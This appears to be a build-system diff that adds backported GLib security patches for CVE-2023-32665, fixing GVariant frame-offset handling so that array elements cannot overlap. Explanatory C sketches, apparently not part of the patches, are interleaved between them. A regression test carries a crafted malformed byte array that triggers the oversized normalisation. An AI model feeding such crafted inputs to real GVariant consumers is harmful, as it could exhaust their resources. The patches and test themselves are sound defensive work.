+From 446e69f5edd72deb2196dee36bbaf8056caf6948 Mon Sep 17 00:00:00 2001
+From: William Manley <will@stb-tester.com>
+Date: Wed, 9 Aug 2023 10:39:34 +0000
+Subject: [PATCH] gvariant-serialiser: Factor out functions for dealing with
+ framing offsets
+
+This introduces no functional changes.
+
+Helps: #2121
+
+CVE: CVE-2023-32665
+Upstream-Status: Backport from [https://gitlab.gnome.org/GNOME/glib/-/commit/446e69f5edd72deb2196dee36bbaf8056caf6948]
+Signed-off-by: Siddharth Doshi <sdoshi@mvista.com>
+---
+ glib/gvariant-serialiser.c | 108 +++++++++++++++++++------------------
+ 1 file changed, 57 insertions(+), 51 deletions(-)
+
+diff --git a/glib/gvariant-serialiser.c b/glib/gvariant-serialiser.c
+index 83e9d85..c7c2114 100644
+--- a/glib/gvariant-serialiser.c
++++ b/glib/gvariant-serialiser.c
+@@ -633,30 +633,62 @@ gvs_calculate_total_size (gsize body_size,
+ return body_size + 8 * offsets;
+ }
+
++struct Offsets
++{
++ gsize data_size;
++
++ guchar *array;
++ gsize length;
++ guint offset_size;
++
++ gboolean is_normal;
++};
++
+ static gsize
+-gvs_variable_sized_array_n_children (GVariantSerialised value)
++gvs_offsets_get_offset_n (struct Offsets *offsets,
++ gsize n)
++{
++ return gvs_read_unaligned_le (
++ offsets->array + (offsets->offset_size * n), offsets->offset_size);
++}
++
++static struct Offsets
++gvs_variable_sized_array_get_frame_offsets (GVariantSerialised value)
+ {
++ struct Offsets out = { 0, };
+ gsize offsets_array_size;
+- gsize offset_size;
+ gsize last_end;
+
+ if (value.size == 0)
+- return 0;
+-
+- offset_size = gvs_get_offset_size (value.size);
++ {
++ out.is_normal = TRUE;
++ return out;
++ }
+
+- last_end = gvs_read_unaligned_le (value.data + value.size -
+- offset_size, offset_size);
++ out.offset_size = gvs_get_offset_size (value.size);
++ last_end = gvs_read_unaligned_le (value.data + value.size - out.offset_size,
++ out.offset_size);
+
+ if (last_end > value.size)
+- return 0;
++ return out; /* offsets not normal */
+
+ offsets_array_size = value.size - last_end;
+
+- if (offsets_array_size % offset_size)
+- return 0;
++ if (offsets_array_size % out.offset_size)
++ return out; /* offsets not normal */
++
++ out.data_size = last_end;
++ out.array = value.data + last_end;
++ out.length = offsets_array_size / out.offset_size;
++ out.is_normal = TRUE;
+
+- return offsets_array_size / offset_size;
++ return out;
++}
++
++static gsize
++gvs_variable_sized_array_n_children (GVariantSerialised value)
++{
++ return gvs_variable_sized_array_get_frame_offsets (value).length;
+ }
+
+ static GVariantSerialised
+@@ -664,8 +696,9 @@ gvs_variable_sized_array_get_child (GVariantSerialised value,
+ gsize index_)
+ {
+ GVariantSerialised child = { 0, };
+- gsize offset_size;
+- gsize last_end;
++
++ struct Offsets offsets = gvs_variable_sized_array_get_frame_offsets (value);
++
+ gsize start;
+ gsize end;
+
+@@ -673,18 +706,11 @@ gvs_variable_sized_array_get_child (GVariantSerialised value,
+ g_variant_type_info_ref (child.type_info);
+ child.depth = value.depth + 1;
+
+- offset_size = gvs_get_offset_size (value.size);
+-
+- last_end = gvs_read_unaligned_le (value.data + value.size -
+- offset_size, offset_size);
+-
+ if (index_ > 0)
+ {
+ guint alignment;
+
+- start = gvs_read_unaligned_le (value.data + last_end +
+- (offset_size * (index_ - 1)),
+- offset_size);
++ start = gvs_offsets_get_offset_n (&offsets, index_ - 1);
+
+ g_variant_type_info_query (child.type_info, &alignment, NULL);
+ start += (-start) & alignment;
+@@ -692,11 +718,9 @@ gvs_variable_sized_array_get_child (GVariantSerialised value,
+ else
+ start = 0;
+
+- end = gvs_read_unaligned_le (value.data + last_end +
+- (offset_size * index_),
+- offset_size);
++ end = gvs_offsets_get_offset_n (&offsets, index_);
+
+- if (start < end && end <= value.size && end <= last_end)
++ if (start < end && end <= value.size && end <= offsets.data_size)
+ {
+ child.data = value.data + start;
+ child.size = end - start;
+@@ -768,34 +792,16 @@ static gboolean
+ gvs_variable_sized_array_is_normal (GVariantSerialised value)
+ {
+ GVariantSerialised child = { 0, };
+- gsize offsets_array_size;
+- guchar *offsets_array;
+- guint offset_size;
+ guint alignment;
+- gsize last_end;
+- gsize length;
+ gsize offset;
+ gsize i;
+
+- if (value.size == 0)
+- return TRUE;
+-
+- offset_size = gvs_get_offset_size (value.size);
+- last_end = gvs_read_unaligned_le (value.data + value.size -
+- offset_size, offset_size);
++ struct Offsets offsets = gvs_variable_sized_array_get_frame_offsets (value);
+
+- if (last_end > value.size)
++ if (!offsets.is_normal)
+ return FALSE;
+
+- offsets_array_size = value.size - last_end;
+-
+- if (offsets_array_size % offset_size)
+- return FALSE;
+-
+- offsets_array = value.data + value.size - offsets_array_size;
+- length = offsets_array_size / offset_size;
+-
+- if (length == 0)
++ if (value.size != 0 && offsets.length == 0)
+ return FALSE;
+
+ child.type_info = g_variant_type_info_element (value.type_info);
+@@ -803,14 +809,14 @@ gvs_variable_sized_array_is_normal (GVariantSerialised value)
+ child.depth = value.depth + 1;
+ offset = 0;
+
+- for (i = 0; i < length; i++)
++ for (i = 0; i < offsets.length; i++)
+ {
+ gsize this_end;
+
+- this_end = gvs_read_unaligned_le (offsets_array + offset_size * i,
+- offset_size);
++ this_end = gvs_read_unaligned_le (offsets.array + offsets.offset_size * i,
++ offsets.offset_size);
+
+- if (this_end < offset || this_end > last_end)
++ if (this_end < offset || this_end > offsets.data_size)
+ return FALSE;
+
+ while (offset & alignment)
+@@ -832,7 +838,7 @@ gvs_variable_sized_array_is_normal (GVariantSerialised value)
+ offset = this_end;
+ }
+
+- g_assert (offset == last_end);
++ g_assert (offset == offsets.data_size);
+
+ return TRUE;
+ }
+--
+2.24.4
+
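gvs_variable_sized_array_get_frame_offsets() above centralises how an array's frame-offset table is located: the last offset gives the end of the element data, and everything after it is the table, which must be a whole number of entries. The following standalone sketch reimplements that layout calculation under the same assumptions (little-endian offsets, caller-supplied offset size); the names and the helper are hypothetical, not the patched code:

/* Hypothetical standalone sketch of the frame-offset parsing factored out
 * above.  Assumes little-endian offsets and a caller-supplied offset size
 * (the real code derives it with gvs_get_offset_size()). */
#include <glib.h>
#include <string.h>

typedef struct
{
  gsize data_size;      /* bytes of element data before the table */
  gsize length;         /* number of offset entries */
  gboolean is_normal;   /* FALSE if the table is malformed */
} FrameOffsets;

static gsize
read_le (const guint8 *p, gsize offset_size)
{
  guint64 v = 0;

  /* Assemble a little-endian value of up to 8 bytes. */
  memcpy (&v, p, offset_size);
  return GUINT64_FROM_LE (v);
}

static FrameOffsets
parse_frame_offsets (const guint8 *data, gsize size, gsize offset_size)
{
  FrameOffsets out = { 0, 0, FALSE };
  gsize last_end;

  if (size == 0)
    {
      out.is_normal = TRUE;             /* empty array: no table at all */
      return out;
    }

  last_end = read_le (data + size - offset_size, offset_size);
  if (last_end > size || (size - last_end) % offset_size != 0)
    return out;                         /* offsets not normal */

  out.data_size = last_end;
  out.length = (size - last_end) / offset_size;
  out.is_normal = TRUE;
  return out;
}

int
main (void)
{
  /* "hi" plus a single 1-byte offset (3): a one-element array of strings. */
  const guint8 data[] = { 'h', 'i', '\0', 0x03 };
  FrameOffsets o = parse_frame_offsets (data, sizeof (data), 1);

  g_assert (o.is_normal);
  g_assert_cmpuint (o.length, ==, 1);
  g_assert_cmpuint (o.data_size, ==, 3);
  return 0;
}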
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0003.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0003.patch
new file mode 100644
index 0000000000..e361cc7aad
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0003.patch
@@ -0,0 +1,417 @@
+From ade71fb544391b2e33e1859645726bfee0d5eaaf Mon Sep 17 00:00:00 2001
+From: William Manley <will@stb-tester.com>
+Date: Wed, 16 Aug 2023 03:12:21 +0000
+Subject: [PATCH] gvariant: Don't allow child elements to overlap with each
+ other
+
+If different elements of a variable sized array can overlap with each
+other then we can cause a `GVariant` to normalise to a much larger type.
+
+This commit changes the behaviour of `GVariant` with non-normal form data. If
+an invalid frame offset is found, all subsequent elements are given their
+default value.
+
+When retrieving an element at index `n` we scan the frame offsets up to index
+`n` and if they are not in order we return an element with the default value
+for that type. This guarantees that elements don't overlap with each
+other. We remember the offset we've scanned up to so we don't need to
+repeat this work on subsequent accesses. We skip these checks for trusted
+data.
+
+Unfortunately this makes random access of untrusted data O(n) — at least
+on first access. It doesn't affect the algorithmic complexity of accessing
+elements in order, such as when using the `GVariantIter` interface. Also:
+the cost of validation will be amortised as the `GVariant` instance
+continues to be used.
+
+I've implemented this with 4 different functions, 1 for each element size,
+rather than a loop calling `gvs_read_unaligned_le`, in the hope that the
+compiler will find it easy to optimise and produce fairly tight
+code.
+
+Fixes: #2121
+
+CVE: CVE-2023-32665
+Upstream-Status: Backport from [https://gitlab.gnome.org/GNOME/glib/-/commit/ade71fb544391b2e33e1859645726bfee0d5eaaf]
+Signed-off-by: Siddharth Doshi <sdoshi@mvista.com>
+---
+ glib/gvariant-core.c | 35 ++++++++++++++++
+ glib/gvariant-serialiser.c | 86 ++++++++++++++++++++++++++++++++++++--
+ glib/gvariant-serialiser.h | 8 ++++
+ glib/tests/gvariant.c | 45 ++++++++++++++++++++
+ 4 files changed, 171 insertions(+), 3 deletions(-)
+
+diff --git a/glib/gvariant-core.c b/glib/gvariant-core.c
+index aa0e0a0..9b51e15 100644
+--- a/glib/gvariant-core.c
++++ b/glib/gvariant-core.c
+@@ -65,6 +65,7 @@ struct _GVariant
+ {
+ GBytes *bytes;
+ gconstpointer data;
++ gsize ordered_offsets_up_to;
+ } serialised;
+
+ struct
+@@ -162,6 +163,24 @@ struct _GVariant
+ * if .data pointed to the appropriate number of nul
+ * bytes.
+ *
++ * .ordered_offsets_up_to: If ordered_offsets_up_to == n this means that all
++ * the frame offsets up to and including the frame
++ * offset determining the end of element n are in
++ * order. This guarantees that the bytes of element
++ * n don't overlap with any previous element.
++ *
++ * For trusted data this is set to G_MAXSIZE and we
++ * don't check that the frame offsets are in order.
++ *
++ * Note: This doesn't imply the offsets are good in
++ * any way apart from their ordering. In particular
++ * offsets may be out of bounds for this value or
++ * may imply that the data overlaps the frame
++ * offsets themselves.
++ *
++ * This field is only relevant for arrays of non
++ * fixed width types.
++ *
+ * .tree: Only valid when the instance is in tree form.
+ *
+ * Note that accesses from other threads could result in
+@@ -365,6 +384,7 @@ g_variant_to_serialised (GVariant *value)
+ (gpointer) value->contents.serialised.data,
+ value->size,
+ value->depth,
++ value->contents.serialised.ordered_offsets_up_to,
+ };
+ return serialised;
+ }
+@@ -396,6 +416,7 @@ g_variant_serialise (GVariant *value,
+ serialised.size = value->size;
+ serialised.data = data;
+ serialised.depth = value->depth;
++ serialised.ordered_offsets_up_to = 0;
+
+ children = (gpointer *) value->contents.tree.children;
+ n_children = value->contents.tree.n_children;
+@@ -439,6 +460,15 @@ g_variant_fill_gvs (GVariantSerialised *serialised,
+ g_assert (serialised->size == value->size);
+ serialised->depth = value->depth;
+
++ if (value->state & STATE_SERIALISED)
++ {
++ serialised->ordered_offsets_up_to = value->contents.serialised.ordered_offsets_up_to;
++ }
++ else
++ {
++ serialised->ordered_offsets_up_to = 0;
++ }
++
+ if (serialised->data)
+ /* g_variant_store() is a public API, so it
+ * it will reacquire the lock if it needs to.
+@@ -481,6 +511,7 @@ g_variant_ensure_serialised (GVariant *value)
+ bytes = g_bytes_new_take (data, value->size);
+ value->contents.serialised.data = g_bytes_get_data (bytes, NULL);
+ value->contents.serialised.bytes = bytes;
++ value->contents.serialised.ordered_offsets_up_to = G_MAXSIZE;
+ value->state |= STATE_SERIALISED;
+ }
+ }
+@@ -561,6 +592,7 @@ g_variant_new_from_bytes (const GVariantType *type,
+ serialised.type_info = value->type_info;
+ serialised.data = (guchar *) g_bytes_get_data (bytes, &serialised.size);
+ serialised.depth = 0;
++ serialised.ordered_offsets_up_to = trusted ? G_MAXSIZE : 0;
+
+ if (!g_variant_serialised_check (serialised))
+ {
+@@ -610,6 +642,8 @@ g_variant_new_from_bytes (const GVariantType *type,
+ value->contents.serialised.data = g_bytes_get_data (bytes, &value->size);
+ }
+
++ value->contents.serialised.ordered_offsets_up_to = trusted ? G_MAXSIZE : 0;
++
+ g_clear_pointer (&owned_bytes, g_bytes_unref);
+
+ return value;
+@@ -1108,6 +1142,7 @@ g_variant_get_child_value (GVariant *value,
+ child->contents.serialised.bytes =
+ g_bytes_ref (value->contents.serialised.bytes);
+ child->contents.serialised.data = s_child.data;
++ child->contents.serialised.ordered_offsets_up_to = s_child.ordered_offsets_up_to;
+
+ return child;
+ }
+diff --git a/glib/gvariant-serialiser.c b/glib/gvariant-serialiser.c
+index c7c2114..fe0b1a4 100644
+--- a/glib/gvariant-serialiser.c
++++ b/glib/gvariant-serialiser.c
+@@ -1,6 +1,7 @@
+ /*
+ * Copyright © 2007, 2008 Ryan Lortie
+ * Copyright © 2010 Codethink Limited
++ * Copyright © 2020 William Manley
+ *
+ * This library is free software; you can redistribute it and/or
+ * modify it under the terms of the GNU Lesser General Public
+@@ -264,6 +265,7 @@ gvs_fixed_sized_maybe_get_child (GVariantSerialised value,
+ value.type_info = g_variant_type_info_element (value.type_info);
+ g_variant_type_info_ref (value.type_info);
+ value.depth++;
++ value.ordered_offsets_up_to = 0;
+
+ return value;
+ }
+@@ -295,7 +297,7 @@ gvs_fixed_sized_maybe_serialise (GVariantSerialised value,
+ {
+ if (n_children)
+ {
+- GVariantSerialised child = { NULL, value.data, value.size, value.depth + 1 };
++ GVariantSerialised child = { NULL, value.data, value.size, value.depth + 1, 0 };
+
+ gvs_filler (&child, children[0]);
+ }
+@@ -317,6 +319,7 @@ gvs_fixed_sized_maybe_is_normal (GVariantSerialised value)
+ /* proper element size: "Just". recurse to the child. */
+ value.type_info = g_variant_type_info_element (value.type_info);
+ value.depth++;
++ value.ordered_offsets_up_to = 0;
+
+ return g_variant_serialised_is_normal (value);
+ }
+@@ -358,6 +361,7 @@ gvs_variable_sized_maybe_get_child (GVariantSerialised value,
+ value.data = NULL;
+
+ value.depth++;
++ value.ordered_offsets_up_to = 0;
+
+ return value;
+ }
+@@ -388,7 +392,7 @@ gvs_variable_sized_maybe_serialise (GVariantSerialised value,
+ {
+ if (n_children)
+ {
+- GVariantSerialised child = { NULL, value.data, value.size - 1, value.depth + 1 };
++ GVariantSerialised child = { NULL, value.data, value.size - 1, value.depth + 1, 0 };
+
+ /* write the data for the child. */
+ gvs_filler (&child, children[0]);
+@@ -408,6 +412,7 @@ gvs_variable_sized_maybe_is_normal (GVariantSerialised value)
+ value.type_info = g_variant_type_info_element (value.type_info);
+ value.size--;
+ value.depth++;
++ value.ordered_offsets_up_to = 0;
+
+ return g_variant_serialised_is_normal (value);
+ }
+@@ -691,6 +696,32 @@ gvs_variable_sized_array_n_children (GVariantSerialised value)
+ return gvs_variable_sized_array_get_frame_offsets (value).length;
+ }
+
++/* Find the index of the first out-of-order element in @data, assuming that
++ * @data is an array of elements of given @type, starting at index @start and
++ * containing a further @len-@start elements. */
++#define DEFINE_FIND_UNORDERED(type) \
++ static gsize \
++ find_unordered_##type (const guint8 *data, gsize start, gsize len) \
++ { \
++ gsize off; \
++ type current, previous; \
++ \
++ memcpy (&previous, data + start * sizeof (current), sizeof (current)); \
++ for (off = (start + 1) * sizeof (current); off < len * sizeof (current); off += sizeof (current)) \
++ { \
++ memcpy (&current, data + off, sizeof (current)); \
++ if (current < previous) \
++ break; \
++ previous = current; \
++ } \
++ return off / sizeof (current) - 1; \
++ }
++
++DEFINE_FIND_UNORDERED (guint8);
++DEFINE_FIND_UNORDERED (guint16);
++DEFINE_FIND_UNORDERED (guint32);
++DEFINE_FIND_UNORDERED (guint64);
++
+ static GVariantSerialised
+ gvs_variable_sized_array_get_child (GVariantSerialised value,
+ gsize index_)
+@@ -706,6 +737,49 @@ gvs_variable_sized_array_get_child (GVariantSerialised value,
+ g_variant_type_info_ref (child.type_info);
+ child.depth = value.depth + 1;
+
++ /* If the requested @index_ is beyond the set of indices whose framing offsets
++ * have been checked, check the remaining offsets to see whether they’re
++ * normal (in order, no overlapping array elements). */
++ if (index_ > value.ordered_offsets_up_to)
++ {
++ switch (offsets.offset_size)
++ {
++ case 1:
++ {
++ value.ordered_offsets_up_to = find_unordered_guint8 (
++ offsets.array, value.ordered_offsets_up_to, index_ + 1);
++ break;
++ }
++ case 2:
++ {
++ value.ordered_offsets_up_to = find_unordered_guint16 (
++ offsets.array, value.ordered_offsets_up_to, index_ + 1);
++ break;
++ }
++ case 4:
++ {
++ value.ordered_offsets_up_to = find_unordered_guint32 (
++ offsets.array, value.ordered_offsets_up_to, index_ + 1);
++ break;
++ }
++ case 8:
++ {
++ value.ordered_offsets_up_to = find_unordered_guint64 (
++ offsets.array, value.ordered_offsets_up_to, index_ + 1);
++ break;
++ }
++ default:
++ /* gvs_get_offset_size() only returns maximum 8 */
++ g_assert_not_reached ();
++ }
++ }
++
++ if (index_ > value.ordered_offsets_up_to)
++ {
++ /* Offsets are invalid somewhere, so return an empty child. */
++ return child;
++ }
++
+ if (index_ > 0)
+ {
+ guint alignment;
+@@ -840,6 +914,9 @@ gvs_variable_sized_array_is_normal (GVariantSerialised value)
+
+ g_assert (offset == offsets.data_size);
+
++ /* All offsets have now been checked. */
++ value.ordered_offsets_up_to = G_MAXSIZE;
++
+ return TRUE;
+ }
+
+@@ -1072,7 +1149,7 @@ gvs_tuple_is_normal (GVariantSerialised value)
+ for (i = 0; i < length; i++)
+ {
+ const GVariantMemberInfo *member_info;
+- GVariantSerialised child;
++ GVariantSerialised child = { 0, };
+ gsize fixed_size;
+ guint alignment;
+ gsize end;
+@@ -1132,6 +1209,9 @@ gvs_tuple_is_normal (GVariantSerialised value)
+ offset = end;
+ }
+
++ /* All element bounds have been checked above. */
++ value.ordered_offsets_up_to = G_MAXSIZE;
++
+ {
+ gsize fixed_size;
+ guint alignment;
+diff --git a/glib/gvariant-serialiser.h b/glib/gvariant-serialiser.h
+index 81343e9..99d18ef 100644
+--- a/glib/gvariant-serialiser.h
++++ b/glib/gvariant-serialiser.h
+@@ -29,6 +29,14 @@ typedef struct
+ guchar *data;
+ gsize size;
+ gsize depth; /* same semantics as GVariant.depth */
++ /* If ordered_offsets_up_to == n this means that all the frame offsets up to and
++ * including the frame offset determining the end of element n are in order.
++ * This guarantees that the bytes of element n don't overlap with any previous
++ * element.
++ *
++ * This is both read and set by g_variant_serialised_get_child for arrays of
++ * non-fixed-width types */
++ gsize ordered_offsets_up_to;
+ } GVariantSerialised;
+
+ /* deserialisation */
+diff --git a/glib/tests/gvariant.c b/glib/tests/gvariant.c
+index 0e5ec8e..967e9a1 100644
+--- a/glib/tests/gvariant.c
++++ b/glib/tests/gvariant.c
+@@ -1,5 +1,6 @@
+ /*
+ * Copyright © 2010 Codethink Limited
++ * Copyright © 2020 William Manley
+ *
+ * This library is free software; you can redistribute it and/or
+ * modify it under the terms of the GNU Lesser General Public
+@@ -1283,6 +1284,7 @@ random_instance_filler (GVariantSerialised *serialised,
+ serialised->size = instance->size;
+
+ serialised->depth = 0;
++ serialised->ordered_offsets_up_to = 0;
+
+ g_assert_true (serialised->type_info == instance->type_info);
+ g_assert_cmpuint (serialised->size, ==, instance->size);
+@@ -5039,6 +5041,47 @@ test_normal_checking_array_offsets (void)
+ g_variant_unref (variant);
+ }
+
++/* This is a regression test that we can't have non-normal values that take up
++ * significantly more space than the normal equivalent, by specifying the
++ * offset table entries so that array elements overlap.
++ *
++ * See https://gitlab.gnome.org/GNOME/glib/-/issues/2121#note_832242 */
++static void
++test_normal_checking_array_offsets2 (void)
++{
++ const guint8 data[] = {
++ 'h', 'i', '\0',
++ 0x03, 0x00, 0x03,
++ 0x06, 0x00, 0x06,
++ 0x09, 0x00, 0x09,
++ 0x0c, 0x00, 0x0c,
++ 0x0f, 0x00, 0x0f,
++ 0x12, 0x00, 0x12,
++ 0x15, 0x00, 0x15,
++ };
++ gsize size = sizeof (data);
++ const GVariantType *aaaaaaas = G_VARIANT_TYPE ("aaaaaaas");
++ GVariant *variant = NULL;
++ GVariant *normal_variant = NULL;
++ GVariant *expected = NULL;
++
++ variant = g_variant_new_from_data (aaaaaaas, data, size, FALSE, NULL, NULL);
++ g_assert_nonnull (variant);
++
++ normal_variant = g_variant_get_normal_form (variant);
++ g_assert_nonnull (normal_variant);
++ g_assert_cmpuint (g_variant_get_size (normal_variant), <=, size * 2);
++
++ expected = g_variant_new_parsed (
++ "[[[[[[['hi', '', ''], [], []], [], []], [], []], [], []], [], []], [], []]");
++ g_assert_cmpvariant (expected, variant);
++ g_assert_cmpvariant (expected, normal_variant);
++
++ g_variant_unref (expected);
++ g_variant_unref (normal_variant);
++ g_variant_unref (variant);
++}
++
+ /* Test that a tuple with invalidly large values in its offset table is
+ * normalised successfully without looping infinitely. */
+ static void
+@@ -5206,6 +5249,8 @@ main (int argc, char **argv)
+ test_normal_checking_tuples);
+ g_test_add_func ("/gvariant/normal-checking/array-offsets",
+ test_normal_checking_array_offsets);
++ g_test_add_func ("/gvariant/normal-checking/array-offsets2",
++ test_normal_checking_array_offsets2);
+ g_test_add_func ("/gvariant/normal-checking/tuple-offsets",
+ test_normal_checking_tuple_offsets);
+ g_test_add_func ("/gvariant/normal-checking/empty-object-path",
+--
+2.24.4
+
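The DEFINE_FIND_UNORDERED macro above expands to one scanning function per offset width, each returning the index of the last entry, at or after @start, up to which the offsets are still in non-decreasing order. Below is the 16-bit expansion written out by hand with a small driver; the driver is illustrative and not part of the patch:

/* Hypothetical expansion of DEFINE_FIND_UNORDERED (guint16) from the patch
 * above, plus a small driver. */
#include <glib.h>
#include <string.h>

static gsize
find_unordered_guint16 (const guint8 *data, gsize start, gsize len)
{
  gsize off;
  guint16 current, previous;

  memcpy (&previous, data + start * sizeof (current), sizeof (current));
  for (off = (start + 1) * sizeof (current); off < len * sizeof (current); off += sizeof (current))
    {
      memcpy (&current, data + off, sizeof (current));
      if (current < previous)
        break;
      previous = current;
    }
  return off / sizeof (current) - 1;
}

int
main (void)
{
  /* Offsets 1, 4, 3, 9: entry 2 (value 3) is the first one out of order, so
   * the scan reports that ordering holds only up to entry 1. */
  const guint16 offsets[] = { 1, 4, 3, 9 };

  g_assert_cmpuint (find_unordered_guint16 ((const guint8 *) offsets, 0, 4), ==, 1);
  return 0;
}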
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0004.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0004.patch
new file mode 100644
index 0000000000..c057729aae
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0004.patch
@@ -0,0 +1,113 @@
+From 345cae9c1aa7bf6752039225ef4c8d8d69fa8d76 Mon Sep 17 00:00:00 2001
+From: Philip Withnall <pwithnall@endlessos.org>
+Date: Fri, 11 Aug 2023 04:09:12 +0000
+Subject: [PATCH] gvariant-serialiser: Factor out code to get bounds of a tuple
+ member
+
+This introduces no functional changes.
+
+Signed-off-by: Philip Withnall <pwithnall@endlessos.org>
+
+Helps: #2121
+
+CVE: CVE-2023-32665
+Upstream-Status: Backport from [https://gitlab.gnome.org/GNOME/glib/-/commit/345cae9c1aa7bf6752039225ef4c8d8d69fa8d76]
+Signed-off-by: Siddharth Doshi <sdoshi@mvista.com>
+---
+ glib/gvariant-serialiser.c | 73 ++++++++++++++++++++++++--------------
+ 1 file changed, 46 insertions(+), 27 deletions(-)
+
+diff --git a/glib/gvariant-serialiser.c b/glib/gvariant-serialiser.c
+index fe0b1a4..6f9b366 100644
+--- a/glib/gvariant-serialiser.c
++++ b/glib/gvariant-serialiser.c
+@@ -942,6 +942,51 @@ gvs_variable_sized_array_is_normal (GVariantSerialised value)
+ * for the tuple. See the notes in gvarianttypeinfo.h.
+ */
+
++static void
++gvs_tuple_get_member_bounds (GVariantSerialised value,
++ gsize index_,
++ gsize offset_size,
++ gsize *out_member_start,
++ gsize *out_member_end)
++{
++ const GVariantMemberInfo *member_info;
++ gsize member_start, member_end;
++
++ member_info = g_variant_type_info_member_info (value.type_info, index_);
++
++ if (member_info->i + 1)
++ member_start = gvs_read_unaligned_le (value.data + value.size -
++ offset_size * (member_info->i + 1),
++ offset_size);
++ else
++ member_start = 0;
++
++ member_start += member_info->a;
++ member_start &= member_info->b;
++ member_start |= member_info->c;
++
++ if (member_info->ending_type == G_VARIANT_MEMBER_ENDING_LAST)
++ member_end = value.size - offset_size * (member_info->i + 1);
++
++ else if (member_info->ending_type == G_VARIANT_MEMBER_ENDING_FIXED)
++ {
++ gsize fixed_size;
++
++ g_variant_type_info_query (member_info->type_info, NULL, &fixed_size);
++ member_end = member_start + fixed_size;
++ }
++
++ else /* G_VARIANT_MEMBER_ENDING_OFFSET */
++ member_end = gvs_read_unaligned_le (value.data + value.size -
++ offset_size * (member_info->i + 2),
++ offset_size);
++
++ if (out_member_start != NULL)
++ *out_member_start = member_start;
++ if (out_member_end != NULL)
++ *out_member_end = member_end;
++}
++
+ static gsize
+ gvs_tuple_n_children (GVariantSerialised value)
+ {
+@@ -997,33 +1042,7 @@ gvs_tuple_get_child (GVariantSerialised value,
+ }
+ }
+
+- if (member_info->i + 1)
+- start = gvs_read_unaligned_le (value.data + value.size -
+- offset_size * (member_info->i + 1),
+- offset_size);
+- else
+- start = 0;
+-
+- start += member_info->a;
+- start &= member_info->b;
+- start |= member_info->c;
+-
+- if (member_info->ending_type == G_VARIANT_MEMBER_ENDING_LAST)
+- end = value.size - offset_size * (member_info->i + 1);
+-
+- else if (member_info->ending_type == G_VARIANT_MEMBER_ENDING_FIXED)
+- {
+- gsize fixed_size;
+-
+- g_variant_type_info_query (child.type_info, NULL, &fixed_size);
+- end = start + fixed_size;
+- child.size = fixed_size;
+- }
+-
+- else /* G_VARIANT_MEMBER_ENDING_OFFSET */
+- end = gvs_read_unaligned_le (value.data + value.size -
+- offset_size * (member_info->i + 2),
+- offset_size);
++ gvs_tuple_get_member_bounds (value, index_, offset_size, &start, &end);
+
+ /* The child should not extend into the offset table. */
+ if (index_ != g_variant_type_info_n_members (value.type_info) - 1)
+--
+2.24.4
+
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0005.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0005.patch
new file mode 100644
index 0000000000..7e516b07ab
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0005.patch
@@ -0,0 +1,80 @@
+From 73d0aa81c2575a5c9ae77dcb94da919579014fc0 Mon Sep 17 00:00:00 2001
+From: Philip Withnall <pwithnall@endlessos.org>
+Date: Fri, 11 Aug 2023 04:13:02 +0000
+Subject: [PATCH] gvariant-serialiser: Rework child size calculation
+
+This reduces a few duplicate calls to `g_variant_type_info_query()` and
+explains why they’re needed.
+
+Signed-off-by: Philip Withnall <pwithnall@endlessos.org>
+
+Helps: #2121
+
+CVE: CVE-2023-32665
+Upstream-Status: Backport from [https://gitlab.gnome.org/GNOME/glib/-/commit/73d0aa81c2575a5c9ae77dcb94da919579014fc0]
+Signed-off-by: Siddharth Doshi <sdoshi@mvista.com>
+---
+ glib/gvariant-serialiser.c | 31 +++++++++----------------------
+ 1 file changed, 9 insertions(+), 22 deletions(-)
+
+diff --git a/glib/gvariant-serialiser.c b/glib/gvariant-serialiser.c
+index 6f9b366..fb75923 100644
+--- a/glib/gvariant-serialiser.c
++++ b/glib/gvariant-serialiser.c
+@@ -1007,14 +1007,18 @@ gvs_tuple_get_child (GVariantSerialised value,
+ child.depth = value.depth + 1;
+ offset_size = gvs_get_offset_size (value.size);
+
++ /* Ensure the size is set for fixed-sized children, or
++ * g_variant_serialised_check() will fail, even if we return
++ * (child.data == NULL) to indicate an error. */
++ if (member_info->ending_type == G_VARIANT_MEMBER_ENDING_FIXED)
++ g_variant_type_info_query (child.type_info, NULL, &child.size);
++
+ /* tuples are the only (potentially) fixed-sized containers, so the
+ * only ones that have to deal with the possibility of having %NULL
+ * data with a non-zero %size if errors occurred elsewhere.
+ */
+ if G_UNLIKELY (value.data == NULL && value.size != 0)
+ {
+- g_variant_type_info_query (child.type_info, NULL, &child.size);
+-
+ /* this can only happen in fixed-sized tuples,
+ * so the child must also be fixed sized.
+ */
+@@ -1032,29 +1036,12 @@ gvs_tuple_get_child (GVariantSerialised value,
+ else
+ {
+ if (offset_size * (member_info->i + 1) > value.size)
+- {
+- /* if the child is fixed size, return its size.
+- * if child is not fixed-sized, return size = 0.
+- */
+- g_variant_type_info_query (child.type_info, NULL, &child.size);
+-
+- return child;
+- }
++ return child;
+ }
+
+- gvs_tuple_get_member_bounds (value, index_, offset_size, &start, &end);
+-
+ /* The child should not extend into the offset table. */
+- if (index_ != g_variant_type_info_n_members (value.type_info) - 1)
+- {
+- GVariantSerialised last_child;
+- last_child = gvs_tuple_get_child (value,
+- g_variant_type_info_n_members (value.type_info) - 1);
+- last_end = last_child.data + last_child.size - value.data;
+- g_variant_type_info_unref (last_child.type_info);
+- }
+- else
+- last_end = end;
++ gvs_tuple_get_member_bounds (value, index_, offset_size, &start, &end);
++ gvs_tuple_get_member_bounds (value, g_variant_type_info_n_members (value.type_info) - 1, offset_size, NULL, &last_end);
+
+ if (start < end && end <= value.size && end <= last_end)
+ {
+--
+2.24.4
+
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0006.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0006.patch
new file mode 100644
index 0000000000..8558a7911f
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0006.patch
@@ -0,0 +1,396 @@
